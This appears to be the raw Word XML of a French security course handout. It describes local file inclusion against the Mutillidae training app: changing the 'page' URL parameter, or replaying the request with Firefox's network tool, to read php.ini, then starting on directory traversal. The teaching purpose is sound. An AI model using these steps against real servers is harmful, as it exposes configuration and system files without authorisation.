    <w:p w14:paraId="498E37F3" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Textbody"/>
        <w:rPr>
          <w:color w:val="000066"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000066"/>
        </w:rPr>
        <w:t>Un mécanisme de liste blanche ou de liste noire de caractères interdits ou autorisés peut être mis en place.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70054688" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="900"/>
        </w:tabs>
        <w:rPr>
          <w:color w:val="000066"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000066"/>
        </w:rPr>
        <w:t>Cette vulnérabilité est de moins en moins présente dans les applications récentes qui sont basées majoritairement sur des framework robustes.</w:t>
      </w:r>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="156FC6C5" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titre12"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Dossier documentaire</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C2934AD" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titre11"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="800000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Dossier 1 : Inclusion de fichiers locaux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D6CB21" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:t>Sur un serveur vulnérable, l’inclusion de fichiers locaux se fait en modifiant directement le contenu d’un paramètre transmis dans l’URL (méthode GET).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="723B9B9C" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73CD9BB7" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:t>Exemple sur l’application Mutillidae :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31DBB8FD" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55547EFA" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="12" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" wp14:anchorId="0667101B" wp14:editId="3AE18492">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>635</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3828415" cy="304800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="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pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId20"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3828415" cy="304800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="25981816" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56E0C09C" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0749F87E" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Dans cet exemple, le paramètre (variable de type GET) se nomme </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>page</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> et sa valeur est </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>home.php</w:t>
      </w:r>
      <w:r>
        <w:t>. Il est possible de tester plusieurs combinaisons de fichiers locaux. Plusieurs modes opératoires sont possibles.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BCEA8C1" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="022CC9AF" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Modification directe dans l’URL :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B4202B0" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E6DD1AF" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="13" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" wp14:anchorId="78A7A7AF" wp14:editId="52D8CBD3">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>635</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5758815" cy="1981200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="5"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pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId21"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5758815" cy="1981200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="56121CCD" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:t>Cette méthode est la plus simple car elle ne nécessite aucun outil.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE7C74E" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49D5C537" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Utilisation de l’outil Web Developer de Firefox :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28FBAC91" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A180B7E" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Une fois sur la page d’accueil, cliquer sur </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Home</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="677DD24A" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="14" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" wp14:anchorId="6210432E" wp14:editId="24EE1A46">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>965200</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>133985</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3828415" cy="304800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="6"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pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId20"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3828415" cy="304800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F941D7" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="555FB098" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="530688BD" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CB8AC7A" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Ouvrir l’outil Web Developer de Firefox en suivant le chemin suivant :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13BD9ACA" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BE80262" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>Outils=&gt;Web Developer=&gt; Réseau</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB062FC" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FD24148" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Rafraîchir la page puis, dans la console du bas, chercher la ligne faisant référence au paramètre nommé page.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="101F1192" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12F1BA2D" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="16" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" wp14:anchorId="5D72ABBF" wp14:editId="1333A0B2">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1940560</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>443230</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="988060" cy="311150"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="7" name="Forme1_2"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="987480" cy="310680"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:noFill/>
                        <a:ln w="36357">
                          <a:solidFill>
                            <a:srgbClr val="3465A4"/>
                          </a:solidFill>
                          <a:round/>
                        </a:ln>
                      </wps:spPr>
                      <wps:style>
                        <a:lnRef idx="0">
                          <a:scrgbClr r="0" g="0" b="0"/>
                        </a:lnRef>
                        <a:fillRef idx="0">
                          <a:scrgbClr r="0" g="0" b="0"/>
                        </a:fillRef>
                        <a:effectRef idx="0">
                          <a:scrgbClr r="0" g="0" b="0"/>
                        </a:effectRef>
                        <a:fontRef idx="minor"/>
                      </wps:style>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="4BA1E4F8" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
                            <w:pPr>
                              <w:pStyle w:val="Contenudecadre"/>
                            </w:pPr>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr lIns="17640" tIns="17640" rIns="17640" bIns="17640" anchor="ctr">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:rect w14:anchorId="5D72ABBF" id="Forme1_2" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:152.8pt;margin-top:34.9pt;width:77.8pt;height:24.5pt;z-index:16;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" o:allowincell="f" filled="f" strokecolor="#3465a4" strokeweight="1.0099mm">
                <v:stroke joinstyle="round"/>
                <v:textbox inset=".49mm,.49mm,.49mm,.49mm">
                  <w:txbxContent>
                    <w:p w14:paraId="4BA1E4F8" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
                      <w:pPr>
                        <w:pStyle w:val="Contenudecadre"/>
                      </w:pPr>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="15" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" wp14:anchorId="3EA88C21" wp14:editId="6314A20E">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>79375</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5758815" cy="1294130"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="9"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6"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId22"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5758815" cy="1294130"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E80034C" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="700B683A" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Faire un clic droit sur cette ligne puis cliquer sur </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Modifier et renvoyer</w:t>
      </w:r>
      <w:r>
        <w:t>. Il est ensuite possible de modifier la requête via la fenêtre de droite. Dans cet exemple, on teste le contenu du fichier php.ini du serveur (le chemin vers le fichier peut varier selon la version de PHP).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00AA6F50" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="257CF574" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45E12F1E" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="17" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" wp14:anchorId="2999EBA6" wp14:editId="10F1FCC0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>370205</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>50800</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5019675" cy="1924050"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="10"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
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId23"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5019675" cy="1924050"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD97E48" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34CE735D" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Envoyer la requête au serveur en cliquant sur le bouton </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Send</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F2C7D24" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18C9BD6D" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E74AF14" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Puis sur la ligne correspondante à cette requête, faire un clic droit puis cliquer sur </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Ouvrir dans un nouvel Onglet</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D6D59C0" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="18" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" wp14:anchorId="2E7A0321" wp14:editId="19D6D75E">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>38100</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>88900</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5758815" cy="264160"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="11"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8"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId24"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5758815" cy="264160"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5718D92A" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="19" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" wp14:anchorId="6210E479" wp14:editId="3D19E00E">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>635</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5758815" cy="934720"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="12" name="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9"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId25"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5758815" cy="934720"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F5005DC" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:t>Le serveur a bien tenté d’exécuter le fichier php.ini. Cette méthode est plus longue mais permet de découvrir l’outil Web Developer de Firefox.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BFDAE73" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E1A5069" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Traversement de répertoires :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="528BB5DE" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54CCEAE0" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:t>Il s’agit d’une variante de la première méthode dans laquelle on utilise un chemin relatif dans l’URL par essais successifs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="545B7C6C" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="21" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" wp14:anchorId="24B55AB8" wp14:editId="5C661251">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3696970</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>73660</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1776095" cy="391795"/>
                <wp:effectExtent l="18178" t="18178" r="18178" b="18178"/>
                <wp:wrapNone/>
